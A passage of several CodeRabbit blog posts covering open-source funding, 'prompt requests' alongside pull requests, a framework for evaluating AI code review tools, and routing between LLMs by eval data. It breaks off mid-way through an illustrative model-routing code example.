tier for open-source projects. 
This significant funding is part of our effort to support maintainers who continue to spend valuable time reviewing pull requests, a burden that is often exacerbated by the ongoing influx of AI-generated contributions to OSS projects. Further details on how CodeRabbit distributed more than $600,000 to various projects are available below. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/05345cea8e6dbceda9273b451ff7450540a7d1d0acc45dbd8da231381a08e279_de7cfbdebc.png) Part of our commitment to open source is sponsoring developers on GitHub, where we were able to support 18% of the maintainers for the packages CodeRabbit relies on directly. We're planning to boost that support even more in 2026. In the first quarter of 2026, we are giving away $100,000 to the tools we and members of our community rely on. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f6a5eda745b540a57c7b540142a12ef599cfead1abb7fd13e31b943e6f79da1e_5d72bd43bc.png) We sponsored 74 devs and distributed around $267,000 using [GitHub Sponsors](https://github.com/orgs/coderabbitai/sponsoring) and [Open Collective](https://opencollective.com/coderabbit). We directly collaborated with maintainers to distribute the remaining $360,000+ in funding. Our commitment to open source continues as we launch the [CodeRabbit OSS program](https://docs.google.com/forms/d/e/1FAIpQLScBYzbvjENJLHnMreturAwXZI_90mUPIBonseala1ZAcTeOGw/viewform), which is part of our commitment to giving [$1 million to the open source community](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source).

Show me the prompt: What to know about prompt requests

Aravind Putrevu — Fri, 23 Jan 2026 00:00:00 GMT

In the 1996 film Jerry Maguire, Tom Cruise’s famous phone call, where he shouts “Show me the money!” cuts through everything else. It’s the moment accountability enters the room. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9440fb7738c63b31092688e2f1b7f2f540c551b53ccbd8cfd7eef76b84e111f6_7bc70c99ca.jpg) In AI-assisted software development, “show me the prompt” should play a similar role. As more code is generated by large language models (LLMs), accountability does not disappear. It moves upstream. The question facing modern engineering teams is not whether AI-generated code can be reviewed, but where and how review should happen when intent is increasingly expressed before code exists at all. ## The Twitter debate: Prompts versus pull requests Earlier this week, Gergely Orosz of [Pragmatic Engineer](https://www.pragmaticengineer.com/) shared a quote on Twitter (or X, if you prefer) from an upcoming podcast with [Peter Steinberger](https://steipete.me/), creator of the self-hosted AI agent [Clawdbot](https://github.com/clawdbot/clawdbot). [![](https://victorious-bubble-f69a016683.media.strapiapp.com/63826acfe2487cd3cab492aa997b1a99e036d94fd9afbb8b1511cd46a114aac8_12752bc74e.png)](https://x.com/GergelyOrosz/status/2010683228961509839?s=20) Steinberger’s point was straightforward but provocative: as more code is produced with LLMs, traditional pull requests may no longer be the best way to review changes. Instead, he suggested, reviewers should be given the prompt that generated the change. That idea quickly triggered a polarized response. Supporters argued that reviewing large, AI-generated diffs is becoming increasingly impractical. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/71de8b15ca402cdd94ab954b024ab58420355235707258f757b23fefa6f405ec_d9a1b01544.png)](https://x.com/kieranklaassen/status/2010843579841986904?s=20) From their perspective, the prompt captures intent more directly than the output. 
It tells reviewers what the developer was trying to accomplish, what constraints they set, and what scope they intended. In addition, a prompt can be re-run or adjusted, which makes it easier to validate the approach without combing through thousands of lines of generated code. Critics, however, pointed to issues that prompts alone do not solve: determinism, reproducibility, git blame, and legal accountability. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/fddf299bb1852395769b1a560b4d45b7294b25f2981ed2ed0301bf8ec7dea27d_7405958d67.png)](https://x.com/_hxmmed/status/2010792509572886746?s=20) Because LLM outputs can vary across runs, models, and configurations, approving a prompt does not necessarily mean approving the exact code that ultimately ships. For audits, ownership, and downstream liability, that distinction matters. In their view, code review cannot be replaced by “prompt approval” without weakening the guarantees that PR-based workflows were designed to provide. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/0b2f365792c95d03084662947a4fadd2d10c0888597b1b44cbac3d7d3b9549b3_e20e3c23dd.png)](https://x.com/MisterMattRoth/status/2010806037683847656?s=20) The core disagreement, then, is not whether prompts should be part of review. It is where accountability should live in an AI-assisted workflow: primarily in the prompt, primarily in the code, or in a deliberately structured combination of both. ## What is a prompt request? A prompt request is exactly what it sounds like: a request by a developer for a peer review of their prompt before feeding it into an LLM to generate code. Or, in the case of multi-shot or conversational prompts, a review of the conversation between the developer and the agent. 
Instead of starting review at the diff level, a prompt request asks reviewers to evaluate the instructions given to the LLM so they can sign off on or contribute to the context, intent, constraints, and assumptions that guide the model’s output. A typical prompt request may include:

* The system and user prompts
* Relevant repository or architectural context
* Model selection and configuration
* Constraints, invariants, or non-goals
* Examples of expected behavior

The goal is to make explicit what the model was asked to do before evaluating how well it did it.

[![](https://victorious-bubble-f69a016683.media.strapiapp.com/54a717efd8e848555c4188434238a7acb9c9d25e52173be0a4471cbd6c9351f2_dc83524e79.png)](https://x.com/harjotsgill/status/2010786965264973907?s=20)

In this sense, a prompt request functions more like a design artifact than a code artifact. It captures intent at the moment of generation and helps ensure the prompt is comprehensive and explicit enough to address the requirements. It can help teams better align around how they prompt and ensure that everyone is using the same context to generate code.

## Good news: Prompt requests and pull requests are not in conflict

Much of the debate this week stemmed from treating prompt requests and pull requests as competitors. Either you do a prompt request or a pull request, some commenters suggested. But the two shouldn’t be treated as rivals. After all, they address different failure modes at different stages of the development lifecycle. Just like you’re not going to skip testing because you did a code review, you shouldn’t skip a code review because you did a prompt request.

Prompt requests are valuable because they ensure alignment and best practices early, before any code is generated or committed. They help teams align on what should be built, define boundaries, and constrain agent behavior.
Because large language models are non-deterministic, capturing intent explicitly becomes even more important upstream, where variability is highest. A prompt request can also help ensure that a prompt is optimized for the specific model or tool that will generate the code. That matters for output quality as models increasingly diverge (something we’ve consistently found in our evals).

[![https://github.com/clawdbot/clawdbot/pull/763](https://victorious-bubble-f69a016683.media.strapiapp.com/2524e09a5ce84b7030e8917f0006ffff378750bf9978f1b12aa8a3546848611c_24e631be6f.png)](https://github.com/clawdbot/clawdbot/pull/763)

Pull requests remain essential later, when teams review the exact code that will ship. They preserve determinism, traceability, testing, auditing, and accountability. One captures intent. The other captures execution. Treating prompt requests as replacements for pull requests creates a false tension. Used together, they complement each other. Doing a prompt request and then skipping the pull request is reckless, because the code that was actually produced has never been validated.

## Why teams are drawn to prompt requests

When done as part of a regular software development workflow that includes a thorough code review, prompt requests are a way to shift left and catch issues early. They ensure a team is aligned on the goals of the feature, help optimize the prompt for the model in use, and help ensure that the proper context is supplied to improve the generated output. This can significantly cut down on review effort and issues later on.

When used alone, without a pull request after the code is generated, the primary appeal of prompt requests is cognitive efficiency and speed. AI has dramatically increased the speed at which developers can produce code, but the review process has not kept pace.
As AI-authored changes grow larger and more frequent, line-by-line review becomes increasingly difficult to complete. Subtle defects slip through not because engineers don’t care, but because reviewing enormous, machine-generated diffs is mentally taxing. Prompts, by contrast, are typically shorter and more declarative. Reviewing a prompt allows engineers to reason directly about scope, intent, and constraints without getting buried in implementation details produced by the model. Prompt-first review works particularly well for:

* Scaffolding and boilerplate generation
* Small changes
* Greenfield prototypes
* Fast-moving teams optimizing for iteration speed
* Hobby projects where defects in prod aren’t that consequential

In these cases, the most important question is often not “is every line correct?” but “is this what we meant to build?”

## Where prompt requests fall short

When used in concert with pull requests, prompt requests have few downsides, since they simply offer another opportunity to review the proposed change before generation. The biggest one is the time and cognitive effort a review takes, which could become a new bottleneck for code generation if reviews are slow to arrive.

When treated as a replacement for pull requests, the biggest limitation of prompt requests is non-determinism. After all, the same prompt can produce different outputs across runs or models. That makes reviewing prompts a weak substitute for reviewing an auditable record of what actually shipped. From the perspective of git blame, compliance, or legal accountability, prompt reviews alone are insufficient.

There are also real security and correctness risks. You might think you covered everything in your prompt, but it may encode unsafe assumptions, omit edge cases, or fail to account for system-specific constraints that would normally be caught during careful code review.
Reviewing intent does not guarantee that the generated output is secure, performant, or compliant.

Finally, prompts are highly contextual. A prompt that looks reasonable in isolation can still produce problematic implementations if the reviewer lacks deep familiarity with the codebase, infrastructure, or runtime environment. While prompt reviews are designed to limit this by bringing in additional sets of eyes to improve the prompt, human reviewers make mistakes all the time on actual code. Add in the unpredictability of a model and that’s a recipe for bugs and downtime. These risks increase as prompts are reused or gradually modified over time, or if you change models.

## Prompt requests work best before pull requests

Used together, prompt requests and pull requests offset each other’s weaknesses. A practical workflow might look like this:

1. A developer proposes a prompt request describing the intended change, constraints, and assumptions. This can involve just one prompt or a series of prompts for different parts of the code being generated. In the case of conversational prompts, the dev might propose a conversational response or share their transcript with the LLM after the fact. In that case, the review could help reprompt the agent to generate a better result.
2. The team reviews and aligns on the prompt(s) before code generation.
3. The code is generated and committed.
4. A traditional pull request reviews the concrete output for correctness, safety, and fit.

In this model, prompt requests act as an upstream alignment step for AI-generated work. They reduce ambiguity early, potentially shrink downstream diffs, and make pull requests easier to review. Prompt requests do not replace the later rigor needed in pull requests. They just add more rigor earlier.

## Are prompt requests going to replace pull requests?

Let’s be honest, prompt requests are unlikely to fully replace pull requests.
No one thinks a large publicly traded company is going to trust AI-generated output so completely that it will bet its revenue (and future) on it without careful review. While we are bullish on prompt requests at CodeRabbit, the industry is still in the early stages of their adoption, and today’s LLMs are not capable of fully replacing pull requests.

Will prompt requests work instead of pull requests for smaller open-source or single-maintainer projects? We are likely heading toward that reality sooner rather than later, but pull requests remain an essential part of the current software development lifecycle. This is especially true for production systems, regulated environments, or large teams with shared ownership and long-lived, complex codebases.

Pull requests exist because software development ultimately involves shipping specific, deterministic artifacts into production. As long as that remains true, teams will need a concrete mechanism to review, test, audit, and approve the exact code that runs. The more realistic future is not prompt requests instead of pull requests. It is prompt requests before pull requests.

What is becoming clear is that the quality of the prompt increasingly determines the quality of the output. Treating prompts as first-class artifacts acknowledges that reality without abandoning the safeguards that traditional code review provides. In that sense, “show me the prompt” does not remove accountability. It shifts some of it earlier, where it can reduce rework, surface intent, and make the pull request stage easier rather than unnecessary.

***Interested in trying CodeRabbit? Get a*** [***14-day free trial.***](https://coderabbit.link/kkJYt0S)

An (actually useful) framework for evaluating AI code review tools

David Loker — Fri, 09 Jan 2026 00:00:00 GMT

Benchmarks promise clarity. They’re supposed to reduce a complex system to a score, compare competitors side by side, and let the numbers speak for themselves. But, in practice, they rarely do. Benchmarks don’t measure “quality” in the abstract. They measure whatever the benchmark designer chose to emphasize, under the specific constraints, assumptions, and incentives of the evaluation. Change the dataset, the scoring rubric, the prompts, or the evaluation harness, and the results can shift dramatically. That doesn’t make benchmarks useless, but it does make them fragile, manipulable, and easy to misinterpret. Case in point: database benchmarks.

### Database benchmarks: A *cautionary* tale

The history of database performance benchmarks is a useful example. As benchmarks became standardized, vendors learned how to optimize specifically for the test rather than for real workloads. Query plans were hand-tuned, caching behavior was engineered to exploit assumptions, and systems were configured in ways no production team would realistically deploy. Over time, many engineers stopped trusting benchmark results, treating them as marketing signals rather than reliable indicators of system behavior.

### AI code review benchmarks are on the same trajectory

We’re currently seeing AI code review benchmarks go down a similar path. As models are evaluated on curated PR sets, synthetic issues, or narrowly defined correctness criteria, tools increasingly optimize for benchmark performance rather than for the messy, contextual, high-stakes reality of real code review. The deeper problem is not just that benchmarks can be misleading; it’s that many “ideal” evaluation designs are difficult to execute correctly in real engineering environments. When an evaluation framework is too detached from real workflows, too easy to game by badly configuring a competitor’s tool, or too complex to run well, the results become hard to trust.
What follows is a practical framework for ***effectively*** evaluating AI code review tools, one that balances rigor with feasibility and produces results that are both meaningful and interpretable.

## **Start from your objectives and make them explicit**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0c87e4def55b84c624be10984e21c7930471cbcfdf223e5ede203fcb37e9dace_df0f373fd7.png)

Before assembling datasets or choosing metrics, it’s critical to define what you actually care about. “Better code review” means different things to different teams, and an evaluation that doesn’t encode those differences will inevitably optimize for the wrong outcome. Common objectives include:

* Catching real defects and risks before merge
* Improving long-term maintainability and reducing technical debt
* Avoiding low-value noise that degrades review quality
* Maintaining developer trust and adoption

It’s also important to distinguish between **leading indicators** and **lagging indicators**. Outcomes like fewer production incidents or higher long-term throughput are real and important, but they often emerge over months, not weeks. Shorter evaluations should focus on signals that correlate strongly with those outcomes, such as the quality of issues caught, whether they are acted on, and how developers respond to the tool.

Explicitly ranking your objectives, such as quality impact, precision, developer experience, and throughput, helps ensure that your evaluation answers the questions that actually matter to your organization.

## Determine what kind of evaluation is needed

![](https://victorious-bubble-f69a016683.media.strapiapp.com/83ecf697883bebb9137093fa7fd2879939df727dcb31797a443343fc97330c14_7175e4ce00.png)

The most reliable way to evaluate any tool is a real-world pilot rather than a controlled offline benchmark. A pilot lets you see how the tool works in day-to-day situations instead of judging it on criteria defined by a third-party vendor.
### In-the-wild pilot

The most reliable signals come from observing how a tool behaves in real, day-to-day development. Real-time evaluation reflects actual constraints: deadlines, partial context, competing priorities, and human judgment. It shows not just what a tool can detect in theory, but what it surfaces in practice, and whether those issues matter enough for developers to act on them.

For this, select a few teams or projects for each tool and run each tool for a period of time under normal usage. Measure things like:

* Real-world detection of issues.
* Severity of issues caught.
* Developer satisfaction and perceived utility.

If possible, design A/B-style experiments so you can compare using the tool against no tool on comparable teams or repos, or Tool A against Tool B on similar workloads, perhaps alternating weeks or branches.

### Offline benchmark

For teams that want additional confidence, a controlled detection comparison can provide useful insight, provided you design it yourself using your own pull requests and criteria so that it gives you the data you actually need. However, it’s not required in most cases, since it doesn’t provide as much useful data as a pilot and can be time-intensive to set up.

One practical approach is to use a private evaluation or mirror repository. A small, representative set of pull requests can be replayed, allowing multiple tools to be run on the same diffs without disrupting real workflows. These comparisons are best used to understand coverage differences by severity and category, and to identify systematic strengths and blind spots across tools.

After that, you just need to compute the metrics you’re looking to track. For example:

* Precision/recall by severity and issue type.
* Comment volume and distribution.
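As a rough sketch of that last step, precision and recall by severity could be computed from a hand-labeled replay set along these lines. Everything named here is hypothetical: the `ToolComment` record, its fields, and the sample data assume your team has labeled the known issues in each replayed PR and matched each tool comment to one of them (or marked it as a false positive).

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ToolComment:
    """One comment a tool left on a replayed PR (hypothetical schema)."""
    severity: str                 # severity assigned during labeling
    matched_issue: Optional[str]  # ID of the known issue it matches, or None


def precision_recall_by_severity(comments, known_issues):
    """Return {severity: (precision, recall)}.

    known_issues maps issue ID -> severity for every issue your team
    labeled in the replayed PRs. A value is None when it is undefined
    (no comments, or no known issues, at that severity).
    """
    surfaced = defaultdict(int)  # comments per severity
    correct = defaultdict(int)   # comments that match a known issue
    found = defaultdict(set)     # distinct known issues found, by issue severity
    for c in comments:
        surfaced[c.severity] += 1
        if c.matched_issue in known_issues:
            correct[c.severity] += 1
            found[known_issues[c.matched_issue]].add(c.matched_issue)

    total_known = defaultdict(int)
    for sev in known_issues.values():
        total_known[sev] += 1

    result = {}
    for sev in set(surfaced) | set(total_known):
        precision = correct[sev] / surfaced[sev] if surfaced[sev] else None
        recall = len(found[sev]) / total_known[sev] if total_known[sev] else None
        result[sev] = (precision, recall)
    return result


# Hypothetical labeled data for one tool on a small replay set.
known = {"I1": "critical", "I2": "critical", "I3": "minor"}
tool_comments = [
    ToolComment("critical", "I1"),
    ToolComment("critical", None),   # false positive
    ToolComment("minor", "I3"),
    ToolComment("minor", "I3"),      # duplicate of an already-found issue
]
for severity, (p, r) in sorted(precision_recall_by_severity(tool_comments, known).items()):
    print(severity, "precision:", p, "recall:", r)
```

Duplicate comments on the same issue count toward precision but only once toward recall, which is one reasonable convention among several; pick whichever matches how your reviewers would experience the comments.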
## **Why evaluating multiple tools on the same pull request is usually misleading**

If you want to do a head-to-head comparison via either a benchmark or a pilot, a common instinct is to run every tool on the exact same pull requests. The alternatives are to mirror each PR and run each tool separately on its own copy, or to run the tools on different but comparable PRs. On the surface, running them all simultaneously feels fair and efficient. In practice, it introduces serious problems.

**When multiple AI reviewers comment on the same PR:**

* Human reviewers are overwhelmed with feedback, and cognitive load spikes.
* No single tool can be experienced as it was designed to be used. For example, some tools skip a comment if they see another tool has already made it, leading to the perception that the tool hasn’t found the issue.
* Review behavior changes: comments are skimmed, bulk-dismissed, or ignored.

This creates interference effects. Tools influence each other’s perceived usefulness, and attention, not correctness, becomes the limiting factor. Precision metrics degrade because even high-quality comments may be ignored simply due to volume. That makes it harder to know the percentage of comments your team would accept from each individual tool under normal usage.

The result is that you lose the ability to evaluate usability, trust, workflow fit, and real-world usefulness. You are no longer measuring how a tool performs in practice, but how reviewers cope with noise.

Running multiple tools on the same exact PR can be useful in narrow, controlled contexts, such as offline detection comparisons, but it is a poor way to evaluate the actual experience and value of a code review tool. To understand whether a tool helps your team, it is often best experienced in isolation within a normal review workflow.

## Structuring fair comparisons without complex infrastructure

There are practical ways to compare tools without building elaborate experimentation harnesses.
**Parallel evaluation across repos or teams** is often the simplest approach. Select repos or teams that are broadly comparable in language, domain, and PR volume, and run different tools in parallel. Keep configuration effort symmetric and analyze results using normalization techniques (discussed below).

Alternatively, **time-sliced evaluation within the same repo or team** can work when parallel groups are not available. Run one tool for a defined period, then switch. This approach requires acknowledging temporal effects (release cycles, workload changes, learning effects) but can still produce useful, directional insights when interpreted carefully.

Finally, simply **mirroring PRs and running reviews on them with separate tools** also works well if you want to compare comments on the same PRs.

In all these cases, the goal is to preserve a clean developer experience while collecting comparable data.

In practice, these approaches can also be combined when a team wants a fuller picture of how a tool works. Teams may start with parallel evaluation across different repositories or teams, then swap tools after a fixed period. This helps balance differences in codebase complexity or workload over time, while still avoiding the disruption and interference that comes from running multiple tools on the same pull request. As with any time-based comparison, results should be normalized and interpreted with awareness of temporal effects, but this hybrid approach often provides a good balance of fairness, practicality, and interpretability.
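One way to picture the hybrid design is as a simple crossover schedule: each group starts on one tool and swaps after a fixed period. The sketch below is illustrative only. The repo names, tool labels, start date, and two-week period are all assumptions, not a recommended configuration.

```python
from datetime import date, timedelta


def crossover_schedule(groups, tools, start, period_days, periods):
    """Rotate tools across groups so that, in any period, each group runs
    exactly one tool and no two groups run the same one.

    Returns a list of (period_start, period_end, group, tool) tuples.
    """
    if len(groups) != len(tools):
        raise ValueError("this sketch assumes one tool per group in each period")
    schedule = []
    for p in range(periods):
        period_start = start + timedelta(days=p * period_days)
        period_end = period_start + timedelta(days=period_days - 1)
        for g, group in enumerate(groups):
            # Shift the assignment by one position each period.
            tool = tools[(g + p) % len(tools)]
            schedule.append((period_start, period_end, group, tool))
    return schedule


# Hypothetical pilot: two broadly comparable repos, two tools, two 14-day periods.
for row in crossover_schedule(
    groups=["payments-api", "web-frontend"],
    tools=["Tool A", "Tool B"],
    start=date(2026, 2, 2),
    period_days=14,
    periods=2,
):
    print(*row)
```

With as many periods as tools, every group ends up using every tool once, which is what lets differences in codebase complexity average out across the comparison.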
## **Metrics that produce interpretable results**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/4ef99ab93155af4ddd13fcb2f944a09569953839c049c827c2e48475613b3a5d_054bcf8d74.png)

Based on successful deployments across thousands of repositories, we’ve identified seven metric categories that together provide a complete picture of your integration. These are the metrics we suggest our customers measure. Each category answers a specific question about your AI implementation:

1. **Architectural Metrics** – Is the tool appropriately integrated? These metrics include how many of an org’s repos are connected and how many extensions are in use (git, IDE, CLI).
2. **Adoption Metrics** – Are developers actually using it? These metrics include monthly active users (MAU), the percentage of total repositories covered, and week-over-week growth.
3. **Engagement Metrics** – Are they just ignoring it or actively collaborating with it? These metrics include PRs reviewed versus Chat Sessions initiated. Also track “Learnings used,” how often the AI applies context from previous reviews to new ones.
4. **Impact Metrics** – Is it catching bugs that matter to the team? These metrics include number of issues detected, actionable suggestions, and the “acceptance rate” (percentage of AI comments that result in a code change).
5. **Quality & Security Metrics** – Is it preventing expensive bugs and security vulnerabilities? These metrics include Linter/SAST findings, security vulnerabilities caught (e.g., Gitleaks), and reduction in pipeline failures.
6. **Governance Metrics** – Is it enforcing standards across the team? These metrics include usage of pre-merge checks, warnings vs. errors, and implementation of custom governance rules.
7. **Developer Sentiment** – Are the developers happy with their experience and the product? These metrics include survey results, qualitative feedback, and “aha” moments.
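To make the impact metrics concrete, here is a minimal sketch of how an acceptance rate might be computed from exported review comments. The `ReviewComment` fields are a hypothetical export schema, not any tool’s actual format, and would need to be mapped to whatever your code host or review tool provides.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ReviewComment:
    """One AI review comment (hypothetical export schema)."""
    pr_id: int
    severity: str   # e.g. "critical", "major", "minor"
    accepted: bool  # True if the comment resulted in a code change


def acceptance_summary(comments):
    """Return the overall acceptance rate, per-severity rates, and comment volume."""
    if not comments:
        raise ValueError("no comments to summarize")
    total = Counter(c.severity for c in comments)
    accepted = Counter(c.severity for c in comments if c.accepted)
    # Only PRs that received at least one comment are counted here.
    commented_prs = {c.pr_id for c in comments}
    return {
        "acceptance_rate": sum(accepted.values()) / len(comments),
        "by_severity": {sev: accepted[sev] / n for sev, n in total.items()},
        "comments_per_commented_pr": len(comments) / len(commented_prs),
    }


# Hypothetical data: four comments across two PRs.
summary = acceptance_summary([
    ReviewComment(pr_id=1, severity="critical", accepted=True),
    ReviewComment(pr_id=1, severity="minor", accepted=False),
    ReviewComment(pr_id=2, severity="minor", accepted=True),
    ReviewComment(pr_id=2, severity="minor", accepted=False),
])
print(summary)
```

Reporting the rate next to comment volume matters because either number alone is easy to misread: a high rate on very few comments and a low rate on a flood of comments tell very different stories.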
### **Accepted issues as a primary quality signal**

Not all metrics are equally informative, and some are far easier to misread than others. A practical evaluation should focus more attention on signals that are both meaningful and feasible to measure.

One of the strongest indicators of value is whether a tool’s feedback leads to real action. An issue can reasonably be considered **accepted** when:

* A subsequent commit addresses the comment or thread
* A reviewer explicitly acknowledges that the issue has been resolved

This behavioral signal captures correctness, relevance, and usefulness in a way that pure scoring metrics cannot. Accepted issues should be reported by:

* **Severity** (e.g., critical, major, minor, low, nitpick)
* **Category** (security, logic, performance, maintainability, testing, etc.)

Both absolute counts and rates are informative, especially when interpreted together.

### **Precision and signal-to-noise**

Acceptance rate (accepted issues relative to total surfaced) is a practical proxy for precision. On its own, it is insufficient; paired with comment volume, it becomes far more meaningful. High comment volume with low acceptance is a clear signal of noise. Patterns of systematically ignored categories or directories often reveal where configuration or tuning is needed.

It’s also important to avoid the “LGTM trap.” A tool that leaves very few comments, all correct, may appear precise while missing large classes of issues. In many cases, broad coverage combined with configurability is preferable to narrow precision that cannot be expanded.

### **Coverage and issue discovery in real review flows**

In typical workflows, the sequence is:

PR opens → AI review → issues fixed → human review

Because humans review after the tool, it is often impossible to say with certainty which issues humans would have caught independently.
Instead of trying to infer counterfactuals precisely, focus on practical signals:

* Accepted issues that led to substantive code changes
* Accepted issues in categories humans historically miss (subtle logic, edge cases, maintainability)
* Consistent patterns of issues surfaced across PRs

Sampling can help here. Reviewing a subset of PRs and asking, “Would this issue likely have been caught without the tool?” is often more informative than attempting exhaustive labeling.

### **Normalization: Making comparisons fair**

Raw counts are misleading when pull requests vary widely in size and complexity. Normalization is essential for fair comparison. Useful normalization dimensions include:

* PR size (lines changed, files touched)
* PR type (bug fix, feature, refactor, infra/config, test-only)
* Domain or risk area (frontend/backend, high-risk components)

Comparisons should be made within similar buckets, and distributions are often more informative than averages. Small samples at extremes should be interpreted cautiously.

## **Interpreting throughput and velocity**

Throughput metrics like time-to-merge are easy to misread. When a tool begins catching real issues that were previously missed, merge times may initially increase. This often reflects improved rigor rather than reduced productivity. Throughput should therefore be treated as a secondary metric, normalized by PR complexity and evaluated over time alongside quality indicators. Short-term slowdowns can be a leading indicator of long-term gains in code health.

## **Bringing it all together**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/b2f514912ab22c31e2c39994d7c2874f0f9660c4fb1a6103cfc9692e063092e3_bc6cc3c7e3.png)

A reliable evaluation does not require perfect benchmarks or elaborate experimental design. It requires clarity about objectives, careful interpretation of metrics, and an emphasis on real-world behavior. Start with normal workflows and behavioral signals.
Normalize to make comparisons fair. Use controlled comparisons selectively to deepen understanding. Combine quantitative metrics with concrete examples of impact.

## **Final takeaway**

Benchmarks are useful starting points, not verdicts. The most trustworthy evaluations of AI code review tools are grounded in real workflows, rely on signals drawn from user behavior, and balance rigor with practicality. When done well, they provide confidence not just that a tool performs well on paper, but that it meaningfully improves both the immediate quality of code changes and the long-term health of the codebase.

***Curious how CodeRabbit performs on your codebase? Get a*** [***free trial today!***](https://coderabbit.link/QjWcnUj)

Why users shouldn’t choose their own LLM models: Choice is not always good

David Loker — Fri, 09 Jan 2026 00:00:00 GMT

Giving users a dropdown of LLMs to choose from often seems like the right product choice. After all, users might have a favorite model or they might want to try the latest release the moment it drops. One problem: unless they’re an ML engineer running regular evals and benchmarks to understand where each model actually performs best, that choice is liable to hurt far more than it helps. You end up giving users what they think they want, while quietly degrading the quality of what they produce with your tool with inconsistent results, wasted tokens, and erratic model behavior. For example, developers may unknowingly pick a model that’s slower, less reliable for their specific task, or tuned for a completely different kind of reasoning pattern. Or they might choose a faster model than they need that won’t comprehensively reason through the task. Choosing which model to use isn’t a matter of personal taste… It's a systems-level optimization problem. The right model for any task depends on measurable performance across dozens of task dimensions, not just how recently it was released or how smart users perceive it to be. And that decision should belong to engineers armed with eval data, not end users who wrongly believe they’ll get better results with the model they personally prefer. ## **The myth of *‘preference’* in AI model selection** Many AI platforms love to market model choice as a premium feature. “Choose GPT-4o, Claude, or Gemini” sounds empowering and gives users the impression that they will get the best or latest experience. It taps into the same instinct that makes people want to buy the newest phone the week it launches: the feeling that *newer* and *bigger* must mean *better*. The reality, though, is that most users have no idea which model actually performs best for their specific use case. And even if they did, that answer would likely shift from one query to another. 
The “best” model for code generation might not be the “best” for bug detection, documentation, or static analysis. There might also be multiple models that are best at different parts of a code review or other task, depending on what kind of code is being reviewed. Some tasks require greater creativity and reasoning depth; others need precision and consistency. A developer who blindly defaults to “the biggest model available” for coding help often ends up with slower, more expensive, and less deterministic results. In some cases, a smaller, domain-tuned model will handily outperform its heavyweight cousin.

## **Why model selection is an *evaluation* problem, not preference**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/afe64f3cbb7380673831ed8effc61d607fed9ec3125a6751dc4f2662afe9a667_c6f0274264.png)

Model selection isn’t a matter of taste… it's a data problem. Behind the scenes, engineers run thousands of evaluations across tasks like code correctness, latency, context retention, and tool integration. These aren’t one-time benchmarks; they’re continuous systems designed to measure how models actually perform under specific, reproducible conditions. The results form a kind of performance map that shows which model excels at refactoring versus summarizing code, or which one handles long-context reasoning without drifting off-topic.

End users never see that map. While some might read benchmarks or articles about a model’s performance, most are making decisions blind, guided mostly by hunches, Reddit posts, or vague impressions of “smartness.” Even if they wanted to, users rarely have the time or infrastructure to run their own evals across hundreds of tasks and models. The result is that people often optimize for hype rather than outcomes… choosing the model that feels cleverest or sounds more fluent, not the one that’s objectively better for the job. And human perception alone is a terrible way to evaluate model competence.
A model that seems chatty and confident can be consistently wrong, while one that feels hesitant might actually deliver the most accurate, reproducible results. Without hard data from evaluations, those distinctions disappear. ## **The prompting paradox** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9ced408c9e0d54febda787ff0254b0affc4ff47aaac1537a92dcc168f24992ec_d1deb33f43.png) One critical drawback to choosing your own model is that no two LLMs *think* alike. Each model interprets prompts slightly differently. Some are more literal, others more associative; some favor verbosity, others prefer minimalism. A prompt that works perfectly on GPT-5 might completely derail on Sonnet 4.5, leading to hallucinated code, missing context, or an output that ignores key constraints. Temperature, context length, and formatting differences only make the problem worse. A model with a higher temperature parameter might produce creative explanations but rewrite variable names, while another with stricter formatting rules could break markdown or indentation. These small mismatches can quietly poison a workflow, especially in environments where consistent structure matters most like with code reviews, diff comments, or documentation summaries. When users choose their own models, they unknowingly disrupt the prompt-engineering assumptions that keep those workflows stable in systems where the prompts are written for the user. Every prompt is tuned with certain expectations about how the model parses instructions, handles errors, and formats its output. Swap out the model and those assumptions collapse. It’s even harder to navigate in situations where the user writes the prompt themselves, like with AI coding tools. Users rarely have enough context, knowledge, and experience to write effective prompts for each model. However, over time, they might find a few prompting methods that help them get the best out of a particular model. 
If they later switch to a new model, they often find their old prompts aren’t as effective and have to relearn from scratch how to get the best results from it.

That’s why well-designed systems rely on **model orchestration**, not user preference. In review pipelines or agentic systems, predictability is everything. You need each component to behave consistently so downstream tools and other models can interpret the results. Giving users the freedom to swap models isn’t customization; it’s chaos engineering without the safety net.

## **The hidden costs of model freedom**

Once users can switch models at will, all the invisible consistency that makes AI-assisted workflows dependable begins to crumble. The consequences aren’t abstract; they’re measurable and they multiply fast.

Across teams, the first thing you notice is inconsistency. Two developers can run the same review prompt and get completely different feedback. One gets a precise diff comment; the other might get a philosophical musing on the meaning of clean code. That inconsistency makes it impossible to reproduce results, which is deadly for any process that relies on traceability or QA.

Then there’s cost. Larger models burn through budget faster and often respond more slowly, introducing both financial waste and latency drag. And when users unknowingly pick models with shorter context windows, the result is truncated inputs or missing context. It’s like asking someone to summarize a novel after reading only half of it.

## **The better alternative: Dynamic, data-driven routing**

The smarter alternative to user-driven chaos is dynamic, data-driven routing: systems that automatically choose the right model for the right task. Instead of asking users to guess which LLM might perform best, auto-routing engines make that choice in real time based on metrics, evals, and historical performance. Think of it as orchestration, not selection.
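As a rough illustration of routing on eval data rather than preference, here is a minimal sketch. It is not CodeRabbit's routing logic: the model names, task labels, scores, and the `routeModel` helper are all hypothetical, and a real router would weigh many more signals.

```javascript
// Hypothetical eval results: measured quality (0..1), median latency, relative cost.
// All model names and numbers are invented for illustration.
const evalResults = [
  { model: "large-general", task: "code-explanation", quality: 0.92, latencyMs: 4200, cost: 10 },
  { model: "small-tuned", task: "code-explanation", quality: 0.78, latencyMs: 900, cost: 1 },
  { model: "large-general", task: "lint-check", quality: 0.90, latencyMs: 4000, cost: 10 },
  { model: "small-tuned", task: "lint-check", quality: 0.93, latencyMs: 700, cost: 1 },
];

// Pick the cheapest model whose measured quality meets the bar for this task.
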